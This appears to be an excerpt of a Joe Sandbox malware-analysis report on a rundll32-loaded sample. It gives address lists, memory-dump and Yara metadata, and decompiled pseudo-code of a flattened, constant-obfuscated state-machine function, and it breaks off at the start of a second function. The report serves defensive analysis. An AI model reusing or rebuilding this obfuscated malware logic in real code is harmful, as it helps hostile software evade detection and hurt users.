                                                                                                                      0x001824f6
                                                                                                                      0x0018236e
                                                                                                                      0x0018236e
                                                                                                                      0x00000000
                                                                                                                      0x0018236e
                                                                                                                      0x001823a7
                                                                                                                      0x001823a9
                                                                                                                      0x001824a9
                                                                                                                      0x001824b7
                                                                                                                      0x001824ba
                                                                                                                      0x001824bf
                                                                                                                      0x001824c1
                                                                                                                      0x0018236e
                                                                                                                      0x0018236e
                                                                                                                      0x00182373
                                                                                                                      0x00182373
                                                                                                                      0x00182378
                                                                                                                      0x00182378
                                                                                                                      0x00000000
                                                                                                                      0x00182378
                                                                                                                      0x001823af
                                                                                                                      0x001823af
                                                                                                                      0x001823b5
                                                                                                                      0x001823bb
                                                                                                                      0x001823c2
                                                                                                                      0x001823d4
                                                                                                                      0x001823d9
                                                                                                                      0x001823e3
                                                                                                                      0x001823ea
                                                                                                                      0x001823fc
                                                                                                                      0x00182429
                                                                                                                      0x00182452
                                                                                                                      0x00182459
                                                                                                                      0x0018246e
                                                                                                                      0x00182473
                                                                                                                      0x00182476
                                                                                                                      0x00182723
                                                                                                                      0x00182723
                                                                                                                      0x00182728
                                                                                                                      0x0018272d
                                                                                                                      0x00182732
                                                                                                                      0x00182732
                                                                                                                      0x00000000
                                                                                                                      0x001823b5
                                                                                                                      0x001823a9
                                                                                                                      0x001823a1
                                                                                                                      0x00182399
                                                                                                                      0x0018238d
                                                                                                                      0x00182385
                                                                                                                      0x00182645
                                                                                                                      0x0018264f
                                                                                                                      0x0018273e
                                                                                                                      0x0018273e
                                                                                                                      0x00000000
                                                                                                                      0x0018274a
                                                                                                                      0x00182378
                                                                                                                      0x00182373

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: B=t$D$D'$Kk$V\6$W7$\9$d_2$^$q
                                                                                                                      • API String ID: 0-1686049362
                                                                                                                      • Opcode ID: e15cb535f6193e9fed94072fe96c2fd3000cd6a4fa2da1fdf83c740c7d3fef5c
                                                                                                                      • Instruction ID: 44fbbb04835a20b012a849d5d9d353ba312e4dce13dd20ab5179ef5254204ce0
                                                                                                                      • Opcode Fuzzy Hash: e15cb535f6193e9fed94072fe96c2fd3000cd6a4fa2da1fdf83c740c7d3fef5c
                                                                                                                      • Instruction Fuzzy Hash: 6B72FEB15083819BD379CF65C58AB8FBBE2BBD4304F10891DE2DA96260D7B18949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001899AA Relevance: 12.9, Strings: 10, Instructions: 384COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E001899AA() {
				void* _t393;
				signed int _t395;
				signed int _t396;
				signed int _t399;
				signed int _t401;
				signed int _t405;
				signed int _t416;
				void* _t420;
				intOrPtr* _t464;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t485;
				void* _t489;

				 *(_t489 + 0x98) = 0xc8da52;
				 *(_t489 + 0xa0) = 0;
				 *((intOrPtr*)(_t489 + 0x9c)) = 0xe0694f;
				_t420 = 0x1be807e;
				 *(_t489 + 0x30) = 0x503fa2;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) >> 8;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) | 0x613cd221;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) ^ 0x613cd23e;
				 *((intOrPtr*)(_t489 + 0x18)) = 0x638b33;
				 *((intOrPtr*)(_t489 + 0x18)) =  *((intOrPtr*)(_t489 + 0x18)) + 0x7670;
				 *(_t489 + 0xa4) = 0;
				_t471 = 0x25;
				 *(_t489 + 0x2c) =  *(_t489 + 0x28) / _t471;
				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) + 0xfffff8bb;
				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) ^ 0x0002acab;
				 *(_t489 + 0x7c) = 0x85e0fa;
				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) + 0x3665;
				_t472 = 0x78;
				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) / _t472;
				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) ^ 0x00011e0c;
				 *(_t489 + 0x20) = 0x383fb4;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0xbc1f7ed2;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x73642c82;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) >> 0xa;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x003dbfb6;
				 *(_t489 + 0x5c) = 0xbb8564;
				_t473 = 0x44;
				 *(_t489 + 0x5c) =  *(_t489 + 0x5c) / _t473;
				_t474 = 0x6f;
				 *(_t489 + 0x58) =  *(_t489 + 0x5c) * 0x17;
				 *(_t489 + 0x58) =  *(_t489 + 0x58) ^ 0x00393d4f;
				 *(_t489 + 0x14) = 0x7f7e5e;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) + 0xaaec;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) + 0x89a4;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) >> 0xe;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) ^ 0x000cd586;
				 *(_t489 + 0x98) = 0xf466ca;
				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0x21e472eb;
				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0x21177926;
				 *(_t489 + 0x8c) = 0xf41dfa;
				 *(_t489 + 0x8c) =  *(_t489 + 0x8c) << 7;
				 *(_t489 + 0x8c) =  *(_t489 + 0x8c) ^ 0x7a009fd6;
				 *(_t489 + 0x70) = 0x5bd344;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffffa539;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0xd954c9cc;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0xd906e478;
				 *(_t489 + 0x20) = 0x13a841;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) * 0x2b;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x070f8edd;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) / _t474;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x0006f8e9;
				 *(_t489 + 0x38) = 0xfa8d3a;
				 *(_t489 + 0x38) =  *(_t489 + 0x38) + 0xb40d;
				 *(_t489 + 0x38) =  *(_t489 + 0x38) >> 0xd;
				 *(_t489 + 0x38) =  *(_t489 + 0x38) + 0xfffffdcd;
				 *(_t489 + 0x38) =  *(_t489 + 0x38) ^ 0x0000539f;
				 *(_t489 + 0x48) = 0x9c2d9c;
				 *(_t489 + 0x48) =  *(_t489 + 0x48) + 0xffff4328;
				 *(_t489 + 0x48) =  *(_t489 + 0x48) | 0x335ced82;
				 *(_t489 + 0x48) =  *(_t489 + 0x48) ^ 0x33dc9cbe;
				 *(_t489 + 0x80) = 0x96612e;
				_t475 = 0x1b;
				 *(_t489 + 0x84) =  *(_t489 + 0x80) * 6;
				 *(_t489 + 0x84) =  *(_t489 + 0x84) ^ 0x0382c053;
				 *(_t489 + 0x1c) = 0xc28e37;
				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xffffbfaa;
				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xcb4;
				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xffffb9e8;
				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) ^ 0x00c80396;
				 *(_t489 + 0x34) = 0xb1f5e0;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) / _t475;
				_t476 = 0x71;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) / _t476;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) | 0xfe0fc038;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xfe0a805e;
				 *(_t489 + 0x78) = 0xafc36d;
				 *(_t489 + 0x78) =  *(_t489 + 0x78) >> 0xc;
				_t477 = 0x76;
				 *(_t489 + 0x78) =  *(_t489 + 0x78) / _t477;
				 *(_t489 + 0x78) =  *(_t489 + 0x78) ^ 0x000041ea;
				 *(_t489 + 0x98) = 0x19521f;
				 *(_t489 + 0x98) =  *(_t489 + 0x98) | 0xd8938a8f;
				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0xd896baad;
				 *(_t489 + 0xa0) = 0x8c17;
				 *(_t489 + 0xa0) =  *(_t489 + 0xa0) | 0xdec19f4d;
				 *(_t489 + 0xa0) =  *(_t489 + 0xa0) ^ 0xdec779d8;
				 *(_t489 + 0xa4) = 0xd8bcc0;
				 *(_t489 + 0xa4) =  *(_t489 + 0xa4) | 0xa8247ef5;
				 *(_t489 + 0xa4) =  *(_t489 + 0xa4) ^ 0xa8ff4c77;
				 *(_t489 + 0x28) = 0x29b40a;
				 *(_t489 + 0x28) =  *(_t489 + 0x28) + 0xffff8872;
				 *(_t489 + 0x28) =  *(_t489 + 0x28) ^ 0xb7a5f24a;
				_t478 = 0x4b;
				 *(_t489 + 0x28) =  *(_t489 + 0x28) * 0x6c;
				 *(_t489 + 0x28) =  *(_t489 + 0x28) ^ 0x6f6c7a54;
				 *(_t489 + 0x58) = 0x4b8f45;
				 *(_t489 + 0x58) =  *(_t489 + 0x58) / _t478;
				_t479 = 0x65;
				 *(_t489 + 0x58) =  *(_t489 + 0x58) * 0x3a;
				 *(_t489 + 0x58) =  *(_t489 + 0x58) ^ 0x003d129f;
				 *(_t489 + 0x50) = 0xbe9ee7;
				 *(_t489 + 0x50) =  *(_t489 + 0x50) / _t479;
				_t480 = 0x21;
				 *(_t489 + 0x4c) =  *(_t489 + 0x50) / _t480;
				 *(_t489 + 0x4c) =  *(_t489 + 0x4c) ^ 0x0002cf44;
				 *(_t489 + 0x60) = 0x65600b;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) | 0xec945ebd;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) >> 3;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) ^ 0x1d945acd;
				 *(_t489 + 0x2c) = 0xa0640b;
				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) >> 0xc;
				_t487 =  *(_t489 + 0x80);
				_t481 = 0x18;
				 *(_t489 + 0x30) =  *(_t489 + 0x2c) / _t481;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) + 0xffff1131;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) ^ 0xfffa9798;
				 *(_t489 + 0x88) = 0xf27f7;
				 *(_t489 + 0x88) =  *(_t489 + 0x88) | 0x77366d7c;
				 *(_t489 + 0x88) =  *(_t489 + 0x88) ^ 0x7735274d;
				 *(_t489 + 0x60) = 0x482c82;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) << 3;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) << 6;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) ^ 0x9054890c;
				 *(_t489 + 0x70) = 0x370d16;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffff6d24;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffff76cf;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0x00352e72;
				 *(_t489 + 0x68) = 0x1def33;
				 *(_t489 + 0x68) =  *(_t489 + 0x68) << 6;
				 *(_t489 + 0x68) =  *(_t489 + 0x68) | 0x037a4cde;
				 *(_t489 + 0x68) =  *(_t489 + 0x68) ^ 0x077b4a65;
				 *(_t489 + 0x6c) = 0xb09c0e;
				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) | 0xdb8bd061;
				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) << 0xb;
				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) ^ 0xdee5f4d6;
				 *(_t489 + 0x54) = 0x47a16a;
				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0x8e9bba09;
				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0x2cf08045;
				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0xa22d7119;
				 *(_t489 + 0x94) = 0xf12a19;
				 *(_t489 + 0x94) =  *(_t489 + 0x94) >> 0xe;
				 *(_t489 + 0x94) =  *(_t489 + 0x94) ^ 0x000f202b;
				 *(_t489 + 0x14) = 0xa6bc3b;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) ^ 0xdd735814;
				_t482 = 0x17;
				_t468 =  *(_t489 + 0x7c);
				 *(_t489 + 0x10) =  *(_t489 + 0x14) / _t482;
				 *(_t489 + 0x10) =  *(_t489 + 0x10) ^ 0xd88d4109;
				 *(_t489 + 0x10) =  *(_t489 + 0x10) ^ 0xd12bee16;
				 *(_t489 + 0x3c) = 0xc5a0fe;
				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) ^ 0x68fedc8a;
				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) + 0xffff2d8b;
				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) << 2;
				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) ^ 0xa0e5a913;
				_t418 =  *(_t489 + 0x7c);
				_t483 =  *(_t489 + 0x7c);
				 *(_t489 + 0x88) = 0x6bfd68;
				 *(_t489 + 0x88) =  *(_t489 + 0x88) + 0xb2a;
				 *(_t489 + 0x88) =  *(_t489 + 0x88) ^ 0x0062c11e;
				 *(_t489 + 0x44) = 0xc29f93;
				 *(_t489 + 0x44) =  *(_t489 + 0x44) >> 3;
				 *(_t489 + 0x44) =  *(_t489 + 0x44) << 1;
				 *(_t489 + 0x44) =  *(_t489 + 0x44) ^ 0x0034c9e7;
				 *(_t489 + 0x34) = 0x1f0cbd;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) + 0x9a3;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0x409d3612;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xb603e22c;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xf682cf9d;
				while(1) {
					L1:
					_t393 = 0x26766da;
					L2:
					while(_t420 != 0x1be807e) {
						if(_t420 == _t393) {
							_t395 = E001757CE( *((intOrPtr*)(_t489 + 0xcc)),  *((intOrPtr*)(_t489 + 0xd0)),  *(_t489 + 0x50), _t418, _t483, _t468, _t420,  *(_t489 + 0x6c),  *(_t489 + 0x60), _t420,  *(_t489 + 0x4c), _t489 + 0xb8, _t420,  *(_t489 + 0x60));
							_t489 = _t489 + 0x30;
							__eflags = _t395;
							if(_t395 == 0) {
								_t396 =  *(_t489 + 0xa4);
							} else {
								_t485 = _t468;
								while(1) {
									__eflags =  *((intOrPtr*)(_t485 + 4)) - 4;
									if( *((intOrPtr*)(_t485 + 4)) != 4) {
										goto L18;
									}
									L17:
									_t349 = _t485 + 0xc; // 0x11e18
									_t401 = E0018FC96( *(_t489 + 0x34),  *(_t489 + 0x8c), _t487,  *(_t489 + 0x60), _t349);
									_t489 = _t489 + 0xc;
									__eflags = _t401;
									if(_t401 == 0) {
										_t396 = 1;
										 *(_t489 + 0xa4) = 1;
									} else {
										goto L18;
									}
									L23:
									_t483 =  *(_t489 + 0x7c);
									goto L24;
									L18:
									_t399 =  *_t485;
									__eflags = _t399;
									if(_t399 == 0) {
										_t396 =  *(_t489 + 0xa4);
									} else {
										_t485 = _t485 + _t399;
										__eflags =  *((intOrPtr*)(_t485 + 4)) - 4;
										if( *((intOrPtr*)(_t485 + 4)) != 4) {
											goto L18;
										}
									}
									goto L23;
								}
							}
							L24:
							__eflags = _t396;
							if(__eflags == 0) {
								_t393 = 0x26766da;
								_t420 = 0x26766da;
								continue;
							} else {
								_t464 =  *0x195208; // 0x0
								E00177519( *(_t489 + 0x70),  *_t464,  *((intOrPtr*)(_t489 + 0x64)));
								_t420 = 0xa9f14cf;
								goto L1;
							}
							L32:
						} else {
							if(_t420 == 0x7d55797) {
								_t334 = _t489 + 0x28; // 0x6f6c7a54
								E001912A8(_t420,  *_t334, __eflags,  *(_t489 + 0x60),  *((intOrPtr*)(_t489 + 0x18)), _t489 + 0xb8);
								_t405 = E00184FA8( *((intOrPtr*)(_t489 + 0xac)), _t489 + 0xc8,  *((intOrPtr*)(_t489 + 0x9c)),  *(_t489 + 0x7c));
								_t487 = _t405;
								_t489 = _t489 + 0x14;
								_t420 = 0xe18b597;
								 *((short*)(_t405 - 2)) = 0;
								while(1) {
									L1:
									_t393 = 0x26766da;
									goto L2;
								}
							} else {
								if(_t420 == 0x9eda0b2) {
									E00184DAD( *(_t489 + 0x44),  *((intOrPtr*)(_t489 + 0x90)), _t418,  *(_t489 + 0x48),  *(_t489 + 0x34));
								} else {
									if(_t420 == 0xa9f14cf) {
										E001768DE( *((intOrPtr*)(_t489 + 0x74)),  *(_t489 + 0x5c),  *(_t489 + 0x98),  *(_t489 + 0x14), _t468);
										_t489 = _t489 + 0xc;
										_t420 = 0x9eda0b2;
										while(1) {
											L1:
											_t393 = 0x26766da;
											goto L2;
										}
									} else {
										if(_t420 == 0xacf19b8) {
											_t483 = 0x1000;
											_push(_t420);
											_push(_t420);
											 *(_t489 + 0x84) = 0x1000;
											_t468 = E00183512(0x1000);
											_t393 = 0x26766da;
											__eflags = _t468;
											_t420 =  !=  ? 0x26766da : 0x9eda0b2;
											continue;
										} else {
											if(_t420 != 0xe18b597) {
												L28:
												__eflags = _t420 - 0x5473740;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												_t416 = E0018E938(0x2000000, 1,  *(_t489 + 0x44),  *(_t489 + 0x58),  *(_t489 + 0x94), _t420,  *(_t489 + 0x5c),  *((intOrPtr*)(_t489 + 0x90)), _t420,  *(_t489 + 0x20),  *(_t489 + 0x2c) | 0x00000006, _t489 + 0xb8);
												_t418 = _t416;
												_t489 = _t489 + 0x28;
												if(_t416 != 0xffffffff) {
													_t420 = 0xacf19b8;
													while(1) {
														L1:
														_t393 = 0x26766da;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
						goto L32;
					}
					_t420 = 0x7d55797;
					goto L28;
				}
			}




























                                                                                                                      0x001899b0
                                                                                                                      0x001899bd
                                                                                                                      0x001899c6
                                                                                                                      0x001899d1
                                                                                                                      0x001899d6
                                                                                                                      0x001899de
                                                                                                                      0x001899e3
                                                                                                                      0x001899eb
                                                                                                                      0x001899f3
                                                                                                                      0x001899fb
                                                                                                                      0x00189a07
                                                                                                                      0x00189a14
                                                                                                                      0x00189a19
                                                                                                                      0x00189a1f
                                                                                                                      0x00189a27
                                                                                                                      0x00189a2f
                                                                                                                      0x00189a37
                                                                                                                      0x00189a43
                                                                                                                      0x00189a48
                                                                                                                      0x00189a4e
                                                                                                                      0x00189a56
                                                                                                                      0x00189a5e
                                                                                                                      0x00189a66
                                                                                                                      0x00189a6e
                                                                                                                      0x00189a73
                                                                                                                      0x00189a7b
                                                                                                                      0x00189a87
                                                                                                                      0x00189a8c
                                                                                                                      0x00189a97
                                                                                                                      0x00189a98
                                                                                                                      0x00189a9c
                                                                                                                      0x00189aa4
                                                                                                                      0x00189aac
                                                                                                                      0x00189ab4
                                                                                                                      0x00189abc
                                                                                                                      0x00189ac1
                                                                                                                      0x00189ac9
                                                                                                                      0x00189ad4
                                                                                                                      0x00189adf
                                                                                                                      0x00189aea
                                                                                                                      0x00189af5
                                                                                                                      0x00189afd
                                                                                                                      0x00189b08
                                                                                                                      0x00189b10
                                                                                                                      0x00189b18
                                                                                                                      0x00189b20
                                                                                                                      0x00189b28
                                                                                                                      0x00189b35
                                                                                                                      0x00189b39
                                                                                                                      0x00189b47
                                                                                                                      0x00189b4b
                                                                                                                      0x00189b53
                                                                                                                      0x00189b5b
                                                                                                                      0x00189b63
                                                                                                                      0x00189b68
                                                                                                                      0x00189b70
                                                                                                                      0x00189b78
                                                                                                                      0x00189b80
                                                                                                                      0x00189b88
                                                                                                                      0x00189b92
                                                                                                                      0x00189b9a
                                                                                                                      0x00189baf
                                                                                                                      0x00189bb2
                                                                                                                      0x00189bb9
                                                                                                                      0x00189bc4
                                                                                                                      0x00189bcc
                                                                                                                      0x00189bd4
                                                                                                                      0x00189bdc
                                                                                                                      0x00189be4
                                                                                                                      0x00189bec
                                                                                                                      0x00189bfc
                                                                                                                      0x00189c04
                                                                                                                      0x00189c09
                                                                                                                      0x00189c0f
                                                                                                                      0x00189c17
                                                                                                                      0x00189c1f
                                                                                                                      0x00189c27
                                                                                                                      0x00189c30
                                                                                                                      0x00189c35
                                                                                                                      0x00189c3b
                                                                                                                      0x00189c43
                                                                                                                      0x00189c4e
                                                                                                                      0x00189c59
                                                                                                                      0x00189c64
                                                                                                                      0x00189c6f
                                                                                                                      0x00189c7a
                                                                                                                      0x00189c85
                                                                                                                      0x00189c90
                                                                                                                      0x00189c9b
                                                                                                                      0x00189ca6
                                                                                                                      0x00189cae
                                                                                                                      0x00189cb6
                                                                                                                      0x00189cc3
                                                                                                                      0x00189cc6
                                                                                                                      0x00189cca
                                                                                                                      0x00189cd2
                                                                                                                      0x00189ce2
                                                                                                                      0x00189ceb
                                                                                                                      0x00189cee
                                                                                                                      0x00189cf2
                                                                                                                      0x00189cfa
                                                                                                                      0x00189d0a
                                                                                                                      0x00189d12
                                                                                                                      0x00189d15
                                                                                                                      0x00189d19
                                                                                                                      0x00189d21
                                                                                                                      0x00189d29
                                                                                                                      0x00189d31
                                                                                                                      0x00189d36
                                                                                                                      0x00189d3e
                                                                                                                      0x00189d46
                                                                                                                      0x00189d53
                                                                                                                      0x00189d5a
                                                                                                                      0x00189d5f
                                                                                                                      0x00189d65
                                                                                                                      0x00189d6d
                                                                                                                      0x00189d75
                                                                                                                      0x00189d80
                                                                                                                      0x00189d8b
                                                                                                                      0x00189d96
                                                                                                                      0x00189d9e
                                                                                                                      0x00189da3
                                                                                                                      0x00189da8
                                                                                                                      0x00189db0
                                                                                                                      0x00189db8
                                                                                                                      0x00189dc0
                                                                                                                      0x00189dc8
                                                                                                                      0x00189dd0
                                                                                                                      0x00189dd8
                                                                                                                      0x00189ddd
                                                                                                                      0x00189de5
                                                                                                                      0x00189ded
                                                                                                                      0x00189df5
                                                                                                                      0x00189dfd
                                                                                                                      0x00189e02
                                                                                                                      0x00189e0a
                                                                                                                      0x00189e12
                                                                                                                      0x00189e1a
                                                                                                                      0x00189e22
                                                                                                                      0x00189e2a
                                                                                                                      0x00189e35
                                                                                                                      0x00189e3d
                                                                                                                      0x00189e48
                                                                                                                      0x00189e50
                                                                                                                      0x00189e5c
                                                                                                                      0x00189e5f
                                                                                                                      0x00189e63
                                                                                                                      0x00189e67
                                                                                                                      0x00189e6f
                                                                                                                      0x00189e77
                                                                                                                      0x00189e7f
                                                                                                                      0x00189e87
                                                                                                                      0x00189e8f
                                                                                                                      0x00189e94
                                                                                                                      0x00189e9c
                                                                                                                      0x00189ea0
                                                                                                                      0x00189ea4
                                                                                                                      0x00189eaf
                                                                                                                      0x00189eba
                                                                                                                      0x00189ec5
                                                                                                                      0x00189ecd
                                                                                                                      0x00189ed2
                                                                                                                      0x00189ed6
                                                                                                                      0x00189ede
                                                                                                                      0x00189ee6
                                                                                                                      0x00189eee
                                                                                                                      0x00189ef6
                                                                                                                      0x00189efe
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00000000
                                                                                                                      0x00189f0b
                                                                                                                      0x00189f19
                                                                                                                      0x0018a08a
                                                                                                                      0x0018a08f
                                                                                                                      0x0018a092
                                                                                                                      0x0018a094
                                                                                                                      0x0018a0d4
                                                                                                                      0x0018a096
                                                                                                                      0x0018a096
                                                                                                                      0x0018a098
                                                                                                                      0x0018a098
                                                                                                                      0x0018a09c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a09e
                                                                                                                      0x0018a09e
                                                                                                                      0x0018a0b2
                                                                                                                      0x0018a0b7
                                                                                                                      0x0018a0ba
                                                                                                                      0x0018a0bc
                                                                                                                      0x0018a0ca
                                                                                                                      0x0018a0cb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a0e4
                                                                                                                      0x0018a0e4
                                                                                                                      0x00000000
                                                                                                                      0x0018a0be
                                                                                                                      0x0018a0be
                                                                                                                      0x0018a0c0
                                                                                                                      0x0018a0c2
                                                                                                                      0x0018a0dd
                                                                                                                      0x0018a0c4
                                                                                                                      0x0018a0c4
                                                                                                                      0x0018a098
                                                                                                                      0x0018a09c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a09c
                                                                                                                      0x00000000
                                                                                                                      0x0018a0c2
                                                                                                                      0x0018a098
                                                                                                                      0x0018a0e8
                                                                                                                      0x0018a0e8
                                                                                                                      0x0018a0ea
                                                                                                                      0x0018a10c
                                                                                                                      0x0018a111
                                                                                                                      0x00000000
                                                                                                                      0x0018a0ec
                                                                                                                      0x0018a0f0
                                                                                                                      0x0018a0fc
                                                                                                                      0x0018a102
                                                                                                                      0x00000000
                                                                                                                      0x0018a102
                                                                                                                      0x00000000
                                                                                                                      0x00189f1f
                                                                                                                      0x00189f25
                                                                                                                      0x0018a01e
                                                                                                                      0x0018a022
                                                                                                                      0x0018a040
                                                                                                                      0x0018a045
                                                                                                                      0x0018a047
                                                                                                                      0x0018a04c
                                                                                                                      0x0018a051
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00000000
                                                                                                                      0x00189f06
                                                                                                                      0x00189f2b
                                                                                                                      0x00189f31
                                                                                                                      0x0018a13f
                                                                                                                      0x00189f37
                                                                                                                      0x00189f3d
                                                                                                                      0x00189ffc
                                                                                                                      0x0018a001
                                                                                                                      0x0018a004
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00000000
                                                                                                                      0x00189f06
                                                                                                                      0x00189f43
                                                                                                                      0x00189f49
                                                                                                                      0x00189fb3
                                                                                                                      0x00189fc0
                                                                                                                      0x00189fc1
                                                                                                                      0x00189fc4
                                                                                                                      0x00189fd1
                                                                                                                      0x00189fd3
                                                                                                                      0x00189fd9
                                                                                                                      0x00189fe0
                                                                                                                      0x00000000
                                                                                                                      0x00189f4b
                                                                                                                      0x00189f51
                                                                                                                      0x0018a11d
                                                                                                                      0x0018a11d
                                                                                                                      0x0018a123
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a129
                                                                                                                      0x00189f57
                                                                                                                      0x00189f8f
                                                                                                                      0x00189f94
                                                                                                                      0x00189f96
                                                                                                                      0x00189f9c
                                                                                                                      0x00189fa2
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00000000
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00189f9c
                                                                                                                      0x00189f51
                                                                                                                      0x00189f49
                                                                                                                      0x00189f3d
                                                                                                                      0x00189f31
                                                                                                                      0x00189f25
                                                                                                                      0x0018a14a
                                                                                                                      0x0018a153
                                                                                                                      0x00000000
                                                                                                                      0x0018a153
                                                                                                                      0x0018a118
                                                                                                                      0x00000000
                                                                                                                      0x0018a118

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: M'5w$O=9$Oi$Tzlo$Tzlo$e6$pv$r.5$A$r!
                                                                                                                      • API String ID: 0-357391454
                                                                                                                      • Opcode ID: a4500d445bf42e4b7bb23ca610d87d4b35c3412e7271430e61cde4b38224a93b
                                                                                                                      • Instruction ID: ceca6bedb634903ab13114c41890fad1b973022b4bde89f98c4996a88c1f976c
                                                                                                                      • Opcode Fuzzy Hash: a4500d445bf42e4b7bb23ca610d87d4b35c3412e7271430e61cde4b38224a93b
                                                                                                                      • Instruction Fuzzy Hash: ED1236715083809FD3A8DF25C589A5BBBE1FBC4754F508A1DF2DA86260D7B48A49CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00177B82 Relevance: 12.8, Strings: 10, Instructions: 339COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00177B82(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
